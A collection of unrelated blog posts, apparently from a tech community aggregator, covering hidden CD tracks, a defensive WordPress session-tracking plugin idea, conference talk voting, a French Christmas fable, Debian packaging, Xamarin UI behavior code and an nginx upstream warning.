One of the things a lot of morituri users are puzzled by is its relentless drive to extract every single sample of audio from the CD. Currently, even if it’s a really short pre-gap, and most likely just an inaccurate master or burn, with no useful audio in it.

For me, that was a design goal of morituri – I want to be able to exactly reproduce a CD as is. That is to say, ripping a CD should extract *all* audio from the CD, and it should be possible to make a copy of that CD and then rip that copy, and end up with exactly the same result as from the original CD. (I’m sure there’s a fancy scientific term for that that I can’t remember right now)

To a lot of other people, it seems to be annoying and they don’t like having those small almost empty files lying around.

So I thought I’d do something about that, and that it might be useful as well to analyze my current collection of tracks and figure out what’s in there. Maybe I can find some hidden gems that I hadn’t noticed before?

So I added a quick task to morituri that calculates the maximum sample value (I didn’t want to use my own level element in GStreamer for this as I wanted to make sure it was actual digital zero; this should be done in an element instead though, but I preferred the five minute hack for this one).

And then I ran:

rip debug maxsample /mnt/nas/media/audio/rip/morituri/own/album/*/00*flac

Sadly, that turned up 0 as the biggest sample for all these tracks!

Wait, what? I spent all that time on getting those secret tracks ripped just to get none? That’s not possible! I know some of those tracks!

Maybe the algorithm is wrong. Nope, it works fine on all the regular tracks.

Oh, crap. Maybe morituri has been ripping silence all this time because my CD drive can’t get that data off. Yikes, that would be a bit of egg on my face.

No, it works if I check that Bloc Party track I know about.

Ten minutes of staring at the screen to realize that, while I was outputting names from a variable from the for loop over my arguments, the track I was actually passing to the task was always the first one. Duh. Problem solved.

As for what I found in my collection:

• a cute radio jingle that brought back memories from a live bootleg I had made myself of Bloem. That’s from over ten years ago, but that must have been around the time I learned about the existence of HTOA and wanted to get one in
• found unknown HTOA tracks on Art Brut’s Bang Bang Rock & Roll, Mew’s Half the world is watching me; not their best stuff
• soundscapey or stagesetting tracks on QOTSA’s Songs for the Deaf, Motorpsycho’s Angels and Daemons at play And Blissard; not that worth it (the Blissard track was ok, but really quiet)
• Pulp hid a single piano chord in a 2 second pre-gap on This is Hardcore; very curious. It’s not an intro to the first track, because it doesn’t fit with the sound at all.
• Damien Rice hid a demo version of 9 Crimes (the first track) in the pregap; instead of piano and female vocals, he plays guitar and sings all the parts.
• Got reacquainted with my favourite HTOA tracks: the orchestral quasi-wordless medley on the Luke Haines/Das Capital disc; the first Bloc Party album with a beautiful instrumental (up there with the hidden track at the end of Placebo’s first album; both bands delivering an atypical but stunning moodscape; the beautiful cover of Ben Kenobi’s Theme by Arab Strap on the Cherubs EP (no idea why that landed in my album dir, that needs to be fixed); the silly Soulwax skit for their second album.

Of course, Wikipedia has the last word on everything

I note that they think Pulp recorded a cymbal, not a piano. And now that I see the title of the QOTSA hidden track, I get the joke I think.

In total, on my album collection of 1564 full CD’s, I have 171 HTOA’s ripped, 138 tracks of pure digital silence, and only about 11 are actually useful tracks.

I expected to find more gems in my collection. I’ll go through ep’s, singles and compilations next just to be sure.

But with this code in hand, maybe it’s time to add something to morituri to save the silent HTOA tracks as pure .cue information.

“Knife” is great songwriting by New York’s Harper Blynn, performed live on a balcony in not-so-sunny LA for BalconyTV.

Watch this video on YouTube or on Easy Youtube.

WordPress is a favourite hackers target. Some say that is because it is inherently insecure, but in reality WordPress is mainly a target because of its popularity, because of people not keeping their installations up to date or using easy to guess usernames and passwords and because of vulnerabilities in plugins rather then WordPress itself.

There is, however, one security-related shortcoming in WordPress from a design point of view: sessions are not stored server-side. If someone logs in, a cookie is set in the browser containing username, a session expiration timestamp and a hash. With every new request to WordPress that cookie (and specifically the hash) is checked to validate the session, but there is no check to see if there indeed was such a session.

This can be considered mainly a theoretical shortcoming, not an immediately exploitable vulnerability, because;

1. session-cookies are set with the HTTPOnly-flag so XSS should not be an issue
2. in an ideal world all traffic, once logged in, would be over HTTPS, securing against network sniffing.

But there are other (albeit less obvious) ways to steal cookies or even create create new ones to gain unauthorized access, as demonstrated in this very detailed blogpost. As explained in that article, there is no way to block “fake” session-cookies from gaining access (your OTP plugin won’t protect you either) and there is no functionality to monitor and if needed delete sessions.

So … I wrote a small proof-of-concept plugin that gets triggered upon login, logout and upon session verification (i.e. each request) and which stores sessions server-side, automatically logging out unknown sessions. With that in place, lots of other optional features could easily be added;

• display a list of all known current sessions
• allow one or more sessions to be removed
• compare IP address at session verification against the one at session creation and notify or logout if no match
• compare User Agent (and optionally some HTTP accept-headers) at session verification against the one at session creation and notify or logout if no match
• create an audit log
• …

But … I don’t want to do this on my own. I have 3 plugins already, 2 of which are semi-popular and for which I try to do regular releases and provide great support (and I have a daytime-job and a wife and daughter with whom I love to spend quality time as well). Moreover I really don’t want the plugin to “just” be open source, but I want it to be developed in an open source, collaborative manner as well.

So if you’re a WordPress coder, a security consultant or just an innocent passer-by and you are willing to code, review code, translate or document, then do drop me a line. Fame (but not fortune) will be yours!

Today, disk space is not an issue for most of us. I remember when my father came back at home with my first hard drive (80MB!) for my Amiga in the Nineties. My reaction was “Wow, we will never fill it!“. Today, if I make a sum of all my storage at home, I’m above 10TB! And I’m sure that I will have to add more capacity in the coming months. No, this blog post is not related to “big data” but more a reflection about how developers write applications today. Again, when I was learning programming languages, professors always remembered to the students to keep our eyes on our resources: memory, CPU cycles, I/O and storage. One of the golden rule was: “If you allocated memory, don’t forget to free it! malloc() means free()“. Yeah, at this time, there was no garbage collector. I’m a little bit nostalgic tonight! . Today, computer resources are not a problem anymore. Their prices continue to decrease and the reflex of most developers is just to add resources (“Your application is slow? Add 2 cores and 2 gig of memory“).

I’ll show you a good example of the explosion of resource requirements. Today I was performing some cleanup on my corporate laptop. Being a consultant, it runs plenty of tools such as management consoles provided by $VENDORS. Working for multiple customers running different versions of this product (a well-known firewall brand), I’ve different versions of the tools installed. Of course, I need to keep multiple versions because you need to use the right one to access the firewall running the corresponding version. Just have a look at this screenshot:

(Click to enlarge)

I wonder what will ask the next version of the console as disk storage…

When debating, we usually consider that opinions are merely resulting of being exposed to logical arguments. And understanding them. If arguments are logical and understood, people will change their mind.

Anybody having been connected long enough on the internet knows that it never happens. Everybody stays on his own position. But why?

The reason is simple: changing opinion has a cost. A cost that we usually ignore. A good exercice is to try to evaluate this cost before any debate. For yourself and for the counterpart.

Let’s take a music fan that was convinced that piracy hurts artists. Convincing him that it’s not the case and that piracy is not immoral means to him that, firstly, he was dumb enough to be brainwashed by major companies and that, secondly, the money spent on CD is a complete waste.

Each time you will tell him “Piracy is not hurting artists and not immoral”, he will ear “You are stupid and you wasted money for years”.

This is quite a high cost but not impossible to overcome. It means that arguments should not only convince him, but also overcome that cost.

Worst: intuitively, we take the symmetry of costs for granted.

Let’s take the good old god debate.

For the atheist, the cost of being convinced is usually admitting being wrong. This is a non-negligible cost but sometimes possible. Most non-hardcore atheists are thus quite ready to be convinced. They enter any religious debate expecting the same mindset from the opponents.

But the opposite is not true. For a religious person, believing in god is
often a very important part of her life. In most case, this is something inherited from her parents. Some life choices have been made because of her belief. The person is often engaged in activities and societies related to her belief. It could be as far as being the core foundation of her social circles.

When you say “God doesn’t exist”, the religious will hear “You are stupid, your parents were liars, you wrecked your life and you have no reason to see your friends anymore”.

It looks like a joke, right? It isn’t. But, subconsciously, it is exactly what people feel and understand. No wonder that religious debates are so emotional.

Why do you think that some religious communities are fighting any individual atheist? Why do you think that any religion always try to get money or personal involvement from you? Because they want to increase the cost of not believing in them. Scammers understand that very well: they will ask you more and more money to increase the cost of you realizing it’s a scam.
Before any argument, any debate, ask everyone to answer sincerely to the question “what will happen if I’m convinced? What will I do? What will change in my life?”.

More often than not, changing opinion is simply not an option. Which settle any debate before the start.

And you? Which of your opinions are too costly to be changed? And what can you do to improve the situation?

Picture by r.nial.bradshaw

Stuff like this makes me sad:

apparently rethinkdb’s official js client is coffeescript hahahah #fail

— TJ Holowaychuk (@tjholowaychuk) May 7, 2013

Also, the github issue where TJ requests that everything gets rewritten in plain JavaScript: https://github.com/rethinkdb/rethinkdb/issues/766

We’ve been here before
Language discussions aren’t new (nor is vim vs. emacs). In the GNOME community we’ve seen a ton of them. Just recently there was a huge one at the DX Hackfest.

GNOME/Mono developers have certainly received their dose of crap thrown at them. But so have GNOME developers that preferred Vala, Python, JavaScript, or even just GObject/C. Whatever you seem to be using, it’s never the right thing for someone.

Have all these years of shedding words over it solved anything? Frankly: no. We are still seeing a large combination of languages being used and all of those projects have good reasons to do so.

I get TJ’s point though: by using CoffeeScript, the rethinkdb people are making it harder for the wider JS community to contribute to their project. But…

It really doesn’t matter
Most open-source projects (or modules) don’t have a ton of contributors. It’s usually a modest team of core maintainers/developers that do the bulk of the work. And that’s fine: the success of a project should not be measured by the number of contributors, but by the quality of the software it produces.

This smallish team of core developers will have their own good reasons for picking up a certain language. They’ll use the language that they feel most productive with for the task at hand. And that’s a good thing, they are mostly the people that move the project forward.

The biggest barrier to contributing on a project is not the language, there are plenty of projects written in unproductive languages that get a ton of contributions. Any good programmer can pick up a new language up quickly (and TJ is more than just a good programmer, he’s a fantastic one, much respect). The bigger hurdle is the specific domain knowledge involved.

Let’s all agree to disagree and have some respect for each other’s opinions, they are all valid anyway.

PS: I’ll be heavily moderating comments that try to turn this into a flame-war. I’m writing this to find some more respect and understanding.

I’ve never been a fan of voting for talks, because it tends to be poorly implemented under the guise of democracy. Of course it’s easy for me to talk, I’ve never organized anything at that scale.

I’ll give two examples on why I feel this way, one of which triggering today’s blog post.

First off, my colleague Marek submitted a talk to Djangocon. The talk was about how to use feat (a toolkit we wrote for livetranscoding) to serve Django pages, but in such a way that they can use Deferreds to remove the concurrency bottleneck of “1 request at a time” per process running Django.

Personally, to me, this is one of the most irritating design choices of Django – from the ground up it was built synchronously (which could have been fine in most places). But the fact that, when you get a request, you have to always synchronously respond to it (and block every other request for that process in the meantime) is a design choice that could have easily been avoided.

In our particular use case, it was really painful. If our website has to do an API request to some other service we don’t control that can easily take 30 seconds, our process throughput suddenly becomes 2 pages per minute. All the while, the server is sitting there waiting.

Yes, you can throw RAM at the problem and start 30 times more processes; or thread out API requests; or farm it out to Celery, and do some back-and-forthing to see when the call’s done. Or do any other number of workarounds for a fundamental design choice.

Since we like Twisted, we preferred to throw Twisted at the problem, and ended up with something that worked.

Anyway, that’s a lot of setup to explain what the talk was about. Marek submitted the talk to DjangoCon, and honestly I didn’t expect it to get much traction because, when you’re inside Django, you think like Django, and you don’t really realize that this is a real problem. Most people who do realize it switch away to something else.

But to my surprise, Marek’s talk was the most-voted talk! I wish I could link to the results, but of course that vote site is no longer online.

I guess I expected that would mean he’d be presenting at DjangoCon this year. So I asked him today when his talk was, and he said “Oh that’s right. I did not get accepted.”

Well, that was a surprise. Of course, the organising committee reserves the right to decide on their own – maybe they just didn’t like the talk. But if you ask your potential visitors to vote, you’d expect the most-voted talk to make it on the schedule no ?

The feedback Marek got from them was surprising too, though. Their first response was that this talk was too similar to another talk, titled “How to combine JavaScript & Django in a smart way”. Now, I’m not a JavaScript expert, but from the title alone I can already tell that it’s very unlikely that these two talks have many similarities beyond the word ‘Django’.

After refuting that point, their second reason was that they wanted more experienced speakers (but they didn’t ask Marek for his experience), and their third reason was that the talk was in previous editions of DjangoCon US/EU (it’s unclear whether they meant his talk or the JavaScript one, but Marek’s definitely wasn’t, and we couldn’t find any mention of the other talk in previous conferences. I’m also not sure why that even matters one way or the other. This email thread was in Polish, so I have to rely on Marek’s interpretation of it)

Personally, my reaction would have been to complain to the organizers or Django maintainers. Marek’s flegmatic attitude was much better though – after such an exchange, he simply doesn’t want to have anything to do with the conference.

He’s probably right – it’s hard to argue with someone who doesn’t want to invite you and is lying about the reasons.

The second example is BCNDevCon, a great conference here in Barcelona, organized by a guy who used to work for Flumotion who I have enormous respect for. I’ve never seen anyone create such a big conference over so little time.

He believes strongly in the democratic aspect, and as far as I can tell constructs the schedule solely based on the votes.

Sadly I didn’t go to the last one, and the reason is simply because I felt that the talks that made it were too obviously corporate. A lot of talks were about Microsoft products, and you could tell that they won votes because people’s coworkers voted on talks. I’m not saying that’s necessarily wrong – given that he worked at our company and has friends here, I’m sure people working here presenting at his conference have also done vote tending. It’s natural to do so. But there should be a way to balance that out.

I think the idea of voting is good, but implementation matters too. Ideally, you would only want people that actually are going to show up to vote. I have no idea how you can ensure that, though. Do you ask people to pre-pay ? Do you ask them to commit to pay if at least 50% of their votes make it in the final schedule, kickstarter-style ?

These two examples are on opposite extremes of voting. One conference simply disregards completely what people vote on. If I had voted or bought a ticket, I would feel lied to. Why waste the time of so many people? The other conference puts so much stock in the vote, that I feel the final result was strongly affected. I seriously doubt all those Windows 8 voters actually showed up.

Does anyone have good experiences with conference voting that did work? Feel free to share!

Everybody already faced the same situation: Children like to compare with each others! Put kids in the same room and let them play. Comparisons will start soon: “My dad has a bigger car than yours“, “My plane flies better than yours“, “I can run faster than you“, etc. Sometimes, I’m feeling exactly the same during conversations about infosec products and I’m pissed of this. My opinion is that infosec people also tend to be proud of their security solutions and compare them to others. Like in a kindergarten…

It’s a fact, humans don’t like to assume their errors. It’s not easy to concede a bad choice and say that your security solution does not fullfill its job. But why pretend to have the top-notch-killer-device on the other side?  Remember, years ago, the flame war between Linux and Windows users? (Honestly, I took part of this game when I was young)

Sometimes, colleagues or customers ask me what’s the best choice between “x” or “y“. It’s always difficult for me to answer such questions in a cold start situation. First of all because most of the time, I don’t have enough background to compare them. Of course, the market is full of studies and analyses like the well-known Gartner magic-quadrant. Those can help you to make a first selection. Some vendors ask research firms to make a comparison of their product with direct competitors. If they “asked“, it means they also “paid” for these researches. In a customer – supplier relation, the customer must be happy. May we be certain that the results of the study are fully independent? I’m in doubt…

Personally, the best solution is the one which will solve YOUR issue and match YOUR requirements in terms of:

• Budget
• Features
• Integration in your environment
• Management & Support

Keep in mind that your information security is a big market place where all vendors would like their share of the cake… Select two or three solutions, ask for live demos, setup a PoC (“Proof of Concept“). This could cost time and money but you will have all keys in your hand to make the right decision. Don’t buy a brand, buy a solution!

Il était une fois un enfant appelé Anton. Anton vivait dans une famille très pauvre. Le dimanche, la famille se partageait un artichaut et, le reste de la semaine, se contentait de faire infuser les feuilles de l’artichaut du dimanche, ajoutant parfois quelques pissenlits qu’Anton arrachait sur le chemin de l’école.

Le père d’Anton travaillait à l’usine de nettoyage des pièces de monnaie. À la fin de chaque année, son patron le félicitait et lui octroyait une petite prime. Cette prime était intégralement dépensée à l’achat d’un cadeau de Noël pour Anton et d’un repas pour toute la famille.

Cette année, lorsque le directeur de l’usine demanda à le voir, le père d’Anton se demanda s’il achèterait un livre illustré ou des crayons de couleur. Il emballerait le cadeau dans un papier argenté et le glisserait, la nuit, devant la cheminée. Il grignoterait un morceau d’artichaut qu’Anton aurait placé à l’intention des rennes du père Noël puis il irait se coucher, imaginant la joie pétillant dans les yeux de son fils.

Mais le directeur n’avait pas l’air très souriant. Il mâchonnait nerveusement un gros cigare qui sentait mauvais.
— Les nouvelles ne sont pas bonnes, dit-il au père d’Anton. La crise nous fait perdre des intérêts sur les capitaux des placements dérivés. Nous devons améliorer la rentabilité globale. C’est pourquoi, nous enverrons désormais les pièces de monnaies en Chine, où l’usage de gants et de masques n’est pas obligatoire pour manipuler l’acide chlorydrique. Nous devons malheureusement nous défaire temporairement de nos nettoyeurs, jusqu’à ce que le coût du kérosène dépasse celui des masques et des gants.

Le père d’Anton ne sut que répondre. Pour le repas de Noël ce soir là, ils se contentèrent du traditionnel artichaut. Tout la nuit, le papa d’Anton se retourna en tentant d’oublier le regard déçu qu’afficherait son fils le lendemain en ne découvrant aucun cadeau. Puis, pris d’un inspiration subite, il se leva, pris un crayon, une feuille de papier neuve et croqua l’artichaut. Il alla se coucher, rasséréné.

Le lendemain, Anton se précipita hors de sa chambre mais ne trouva, au pieds de la cheminée, qu’une feuille de papier sur laquelle était écrit :

« Cher Anton,

Tu le sais, j’ai tendance à ne faire qu’un seul cadeau par an aux enfants qui ont été sages.

Mais, cette année, tu as été particulièrement sage. Plutôt que de te faire un seul cadeau, j’ai décidé de t’en offrir pour le restant de ta vie.

À chaque fois que tu seras heureux, à chaque fois que ta maman t’embrassera, que ton papa te caressera les cheveux, ce sera un cadeau que je te fais.

Mais à chaque fois que tu te sentiras malheureux, réfléchis. Au fond de toi tu te rendras compte que tu n’as peut-être pas été assez sage.

Sois sage et je te comblerai de bonheur,

Père Noël »

Anton tendit la lettre à son papa :
— Le père Noël m’a écrit. C’est vraiment lui papa ? C’est une véritable lettre du Père Noël ?
— De qui veux-tu que ce soit d’autre ? fit le papa d’Anton.
Tout en souriant, il passa sa main dans les cheveux de son fils. Anton sut alors au fond de lui que la lettre était vraie. Comme pour confirmer son intuition, Maman l’embrassa et lui souhaita un joyeux Noël. Ses yeux pétillèrent de joie.

Mais la crise touchait durement toute la ville. Les intérêts s’effondraient, les bulles explosaient, les actions s’arrêtaient et les options disparaissaient. Toutes les familles se retrouvèrent en difficulté.

Anton se trouvait à l’âge où, dans les cours de récréation, on se met à exercer son sens critique. Untel a surpris ses parents déposant les cadeaux. Un autre se demande comment le père Noël peut passer dans autant de cheminée en une seule soirée. Un troisième calcule la taille du traîneau nécessaire pour transporter assez de cadeaux. Mais Anton parait à tous ces arguments en exhibant sa lettre.

Mis au courant par leurs enfants, les parents trouvèrent que c’était une très bonne idée pour faire des économies en temps de crise ou, comme le gouvernement l’appelait, en période d’austérité. Et comme le papier et le crayon commençaient eux-mêmes à manquer, les parents se contentèrent de répéter un message transmis par le Père Noël en personne qui était venu cette nuit mais n’avait pas voulu réveiller les enfants.

Les parents vieillirent, les enfants grandirent et devinrent, à leur tour, des parents. À chaque veillée de Noël, on expliquait aux plus jeunes comment le père Noël récompensait les enfants sages. Et lorsqu’un enfant plus éveillé que les autres demandait si le père Noël existait, on lui racontait l’histoire d’Anton qui avait reçu une véritable lettre. La copie de cette lettre pouvait être trouvée dans n’importe quelle maison du pays. D’ailleurs, on l’apprenait par cœur à l’école, au grand dam de l’imprimeur qui avait fait fortune en éditant pour la première fois cette lettre.

Dans les universités, des thèses de doctorat furent écrites pour savoir pourquoi Anton avait été choisi plutôt qu’un autre. D’autres affirmaient que si on traduisait la lettre en langage esquimau, qu’on mélangeait les lettres et qu’on lisait ensuite les lettres placées uniquement en position correspondant à un chiffre premier, on obtenait l’adresse du Père Noël. La faculté d’Aéronautique Du Traîneau fit son apparition et forma des générations de chercheurs scientifiques.

Un jour, un étudiant affirma haut et fort qu’il ne pensait pas que le père Noël existait. D’ailleurs, disait-il, nous n’avons plus la moindre preuve de son existence. Dans les temps anciens, il apportait des cadeaux tangibles. Mais ce sont certainement des racontars. Comment aurait-il pu livrer autant de cadeau en une seule nuit ?

Il lui fut rétorqué que s’il ne croyait pas au père Noël, il n’avait aucune raison d’être sage, qu’il serait donc malheureux. Que le fait qu’il lui arrive des évènements heureux était la preuve de l’existence du père Noël. Que cela revenait à traiter ses parents de menteurs pour lui avoir fait croire à quelque chose qui n’existait pas. Que lui, simple étudiant, osait traiter toute la faculté d’Aéronautique Du Traîneau de menteurs ?

Mais que bon, ça le regardait. Que si il voulait, il pouvait ne pas croire et ne pas être sage. On n’allait pas le tuer, on n’est pas chez les platerristes. Mais qu’il était hors de question de le voir au souper de Noël familial ni à la soirée de Noël avec ses amis.

Comme notre étudiant aimait ses parents, sa famille, ses amis et la faculté d’Aéronautique Du Traîneau, il répliqua que peut-être le père Noël ne voulait-il pas être vu justement pour tester ceux qui étaient vraiment sages.

On considéra que c’était une très bonne explication. Et tout le monde applaudit en se disant que, au moins, les enfants étaient sages, que chacun avait des moments de bonheur et que le Père Noël devait être content d’eux.

Photo par Robert Orr

For (at least) the third time, I managed to register for debconf before registration was actually open. Oops.

I found out that unfortunately, it's not quite certain yet that there will actually be a debcamp this year—and if there is going to be a debcamp, it won't be a full week. Pity. At any rate, I'll be there the whole time, whatever the duration of debcamp.

Since Vaumarcus is closer to Mechelen than Edinburgh (by about 250km), this is going to be the closest debconf for me, ever. And if I could go to Banja Luka by car, I can certainly go to Vaumarcus by car.

Anyone care to join me?

I’d totally try and be the intern for pinboard.

The money is great for a summer job, but that’s not the important part. pinboard seems interesting, it’s a real service, and it’s (I assume) small enough to understand from top to bottom. Contrary to, say, a Google Summer of Code project, you get to touch a real existing service, and from what I can tell from the blog you get to do it with a smart and funny guy.

You’ve got five weeks left; even if you’re in the middle of exams right now, apply!

(And if you do, why not add the features to merge and rename tags while you’re at it?)

Friday-evening, time to pretend you’re a young hipster! And this might help; a great (old, as in over 10 years old) track called “Manila” by Seelenluft in the Manitoba remix, as it was featured in Four Tet’s magnificent “Essential Mix” from way back in 2010;

Watch this video on YouTube or on Easy Youtube.

The vocals are by the Michael Smith, who apparently was only 12 years old when recording “Manila”. There’s multiple remixes of it (and the official clip for the Ewan Pearson remix is pretty funny), but none are as wild as this one. Love those crazy horns, they remind me of (the more recent) Neneh Cherry & The Thing with their freaky cover of Springsteen’s “Dream Baby Dream” (which Four Tet remixed as well).

Being a developer myself, I’m constantly looking at how to improve my way of working. When it comes to mobile development, the best way to improve your life is by using Mono (Xamarin.iOS and Xamarin.Android).

That’s, in a nutshell, the talk I’ve given today at Apps City: an introductory tour on Xamarin.iOS and Xamarin.Android.

Slides are over here, though they’re very light on details and unlike my previous talk, I haven’t had time to annotate them.

Ce jeudi 16 mai 2013 à 19h se déroulera la dix-neuvième séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : Qui contribue à Wikipédia, et pourquoi ?

Thématique : Internet|communauté

Public : Tout public

L’animateur conférencier : Nicolas Jullien (LUSSI, M@rsouin. Institut TELECOM Bretagne & UEB)

Lieu de cette séance : Mundaneum, 76 rue de Nimy à 7000 Mons (cf. ce plan sur le site d’Openstreetmap)

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention (même incertaine) en vous inscrivant via la page http://jeudisdulibre.fikket.com/

Cette séance sera suivie d’un verre de l’amitié, offert par l’A.S.B.L. LoLiGrUB, co-organisatrice des Jeudis du Libre.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des rencontres autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires du Pôle Hainuyer d’enseignement supérieur impliquées dans les formations d’informaticiens (UMONS, HECFH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Wikipédia est sans doute aujourd’hui l’exemple le plus connu d’une communauté ouverte, en ligne, qui autorise à chacun de contribuer pour améliorer le contenu des connaissances disponibles en ligne. Si tout le monde ne participe pas, comme dans d’autres projets en ligne, on peut se demander qui sont les personnes qui participent et pourquoi elles participent.

Après une présentation générale de Wikipédia, et avant une discussion avec la salle, nous présenterons les résultats d’une enquête menée auprès des contributeurs au projet Wikipédia-fr (Wikipédia en langue française).

Information complémentaire : Nicolas Jullien donnera également une conférence dans le cadre du Séminaire InforTech à 17h00 (FPMS, rue de Houdain).

Biographie courte de l’auteur : Enseignant-chercheur à Télécom Bretagne, Brest, Nicolas Jullien étudie les communautés en ligne (logiciel libre, encyclopédie, communautés professionnelles) depuis le début des années 2000. Il s’intéresse aux raisons de participer à de telles communautés, aux différentes étapes dans la participation, à la façon dont les entreprises coopèrent avec les communautés, et au lien entre apprentissage communautaire et marché du travail.

I had a blast at Devopsdays Austin 2013 . Here's my keynote on the 'future of devops'.

My main point is that besides repeating the devops stories, we also need to seek diversity and make sure we keep adapting to situations.

The slides are available on slideshare - http://www.slideshare.net/jedi4ever/future-ofdevopsv2

I was asked to do an introductory session on WPO for the course “Network software and architectures” at Hasselt University and interweave that with my story (how my WPO-related bachelor & master thesis got me an internship at Facebook) to indicate this is not a far-fetched thing — any one of the students in the audience can do this, if they’re interested!

Required background: general web development knowledge, general network knowledge, know what a CDN is.

• WPO
• Hasselt University

De kerken lopen leeg, maar pakweg 5 keer in een mensenleven (doop, eerste communie, tweede communie, huwelijk en dood) speelt de Katholieke Kerk toch een onmiskenbaar grote rol in het leven van veel gelovige en zelfs ongelovige Belgen (en Fransmannen en Spanjaarden en …). Soit, Michel had het er al uitgebreid over, dus dat moet ik hier niet meer doen.

Maar “nee!”, de (Katholieke) Kerk heeft al lang geen monopolie meer op de grote levensmomenten. Want “ja!”, er zijn alternatieven; zeker voor ongelovigen. Het hangt er gewoon van af wat je er zelf van wilt maken, hoe je die grote momenten wilt vieren. Veerle en ik zijn diep-ongelovig en hebben in 2002, samen met een toffe madam van wat toen nog de Unie van Vrijzinnige Verenigingen heette, zelf onze trouwceremonie uitgewerkt. Met diezelfde vrouw hebben we in juli 2006 de geboorte van onze dochter op een voor ons zinvolle manier gevierd. En Elise heeft net haar Lentefeest achter de rug.

Het is maar wat je er zelf van wilt maken, wat voor jou zinvol is. Indien je gelovig bent en geboorte, trouw en dood in en met de Kerk wilt vieren, fantastisch. Maar als dat niet écht zo is, denk dan even na over de alternatieven. En contacteer eventueel het “Huis van de Mens” om te praten over hoe jij zelf zin kunt geven aan die grootse momenten in het leven?

Anyway, a few nice things that I personally like in the new release :

(1) html5 client support. In particular, at this time the ipad. So now, I can use my ipad to log into SGD and connect to my apps without having to download and install a client. It just works with the built-in Safari browser. We will expand this over time, right now it's ipad only.

(2) the tta rpm will automatically pull in all dependencies on Oracle Linux 6. So all you need to do is download the tta (sgd) rpm from oracle.com and type yum install tta-5.00-907.i386.rpm. When Oracle Linux is configured to connect to ULN or just go to http://public-yum.oracle.com it will grab all the required OS rpms. This makes it super easy to install and get going.

To download the software, go to http://edelivery.oracle.com, go to the Oracle Desktop Virtualization Products product pack and click on Oracle Secure Global Desktop 5.0 Media Pack.

... has been released yesterday, apparently. This wouldn't be very special, except that it carries a 'patch' by yours truly. It isn't earthshattering, but hey, I can run 'git log' and find myself, now, in a released kernel.

If that isn't nice.

Just after the release of squeeze, I released nbd 2.9.17, which had a new feature that required some backwards-incompatible change: the ability to specify an export by name, rather than by port number. Obviously, that means that wheezy will be the first release to ship with support for such named exports (although a backport was uploaded to squeeze-backports with support for such a named export). After all, names are that more obvious a way to specify an export than is a meaningless number. The init scripts and root-on-NBD support was updated, although a bugfix was denied for r0 (it will hopefully get into r1).

In addition, during the wheezy cycle I finally finished the partman-nbd support in the installer. With this, it is possible to install Debian to an NBD device on diskless systems, which is nice.

One of the things I do with computers is "do stuff with music". I'm not a professional musician by any means, but I do sometimes have a need for some software to do some music editing.

In the past, that meant using GNU LilyPond; and while that's certainly an interesting piece of software, it has some idiosyncracies that have made me dislike it in the past. So when I learned about PMW, written by Philip Hazel (of PCRE and Exim fame) I was intrigued.

PMW has several advantages over lilypond, in my opinion. To name but two: its syntax is less silly, and it takes far less time to convert something from source to graphic, to the extent that I've considered creating an editor which would update the result after every keystroke, something that just isn't possible with lilypond.

The decision to upload pmw into Debian was just a no-brainer, and it's saved me some time since, already. Enjoy!

Gisteren vierden we dat ons dochterken geen onbeholpen kleuter, maar een zelfstandig denkend kind is geworden.

Dat zelfstandig denken, we gaan dat ongetwijfeld nog vervloeken, maar het is een lief, slim en grappig prachtkind, ons Elise. Ze mag nu stoppen met groot worden, het is goed zo!

public override void ViewDidLoad ()
{
 base.ViewDidLoad ();

 //Set Bindings and Commands
 placeField.Bind (ViewModel, "Place");
 sendButton.Command (ViewModel.SendCommand);
 busyIndicator.Bind (ViewModel, "IsBusy");

 //Slide the view on keyboard show/hide
 placeField.EditingDidBegin += (sender, e) => {
  UIView.BeginAnimations ("keyboardslide");
  UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
  UIView.SetAnimationDuration (.3f);
  var frame = View.Frame;
  frame.Y = -100;
  View.Frame = frame;
  UIView.CommitAnimations();
 };

 placeField.EditingDidEnd += (sender, e) => {
  UIView.BeginAnimations ("keyboardslide");
  UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
  UIView.SetAnimationDuration (.3f);
  var frame = View.Frame;
  frame.Y = 20;
  View.Frame = frame;
  UIView.CommitAnimations();
 };

}

 placeField.Attach (new SlideOnEditBehavior (View, defaultPosition:20, alternatePosition:-100));

public class SlideOnEditBehavior : Behavior
{
 UIView view;
 int defaultPosition;
 int alternatePosition;

 public SlideOnEditBehavior (UIView view, int defaultPosition, int alternatePosition)
 {
  this.view = view;
  this.defaultPosition = defaultPosition;
  this.alternatePosition = alternatePosition;
 }

 protected override void OnAttached ()
 {
  base.OnAttached ();
  AssociatedObject.EditingDidBegin += (sender, e) => {
   UIView.BeginAnimations ("keyboardslide");
   UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
   UIView.SetAnimationDuration (.3f);
   var frame = view.Frame;
   frame.Y = alternatePosition;
   view.Frame = frame;
   UIView.CommitAnimations();
  };

  AssociatedObject.EditingDidEnd += (sender, e) => {
   UIView.BeginAnimations ("keyboardslide");
   UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
   UIView.SetAnimationDuration (.3f);
   var frame = view.Frame;
   frame.Y = defaultPosition;
   view.Frame = frame;
   UIView.CommitAnimations();
  };
 }
}

 placeField.Attach (new BehaviorCollection {
  new SlideOnEditBehavior (View, defaultPosition:20, alternatePosition:-100),
  //Any other behavior here
 });

You may receive the following warning when reloading/configtesting an Nginx configuration that uses upstreams.

$ service nginx configtest
nginx: [warn] load balancing method redefined in /etc/nginx/conf.d/upstream.conf:5
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

This can occur when you conflicting variables inside your upstream, like such:

$ cat upstream.conf 
upstream upstream_name {
  # Use max # keepalive connections
  keepalive 120;
  # Use the backend with least number of connections
  least_conn;
  # All upstream members defined below
  server 192.168.1.5:80  weight=24;
  server 192.168.1.6:80   weight=24;
}

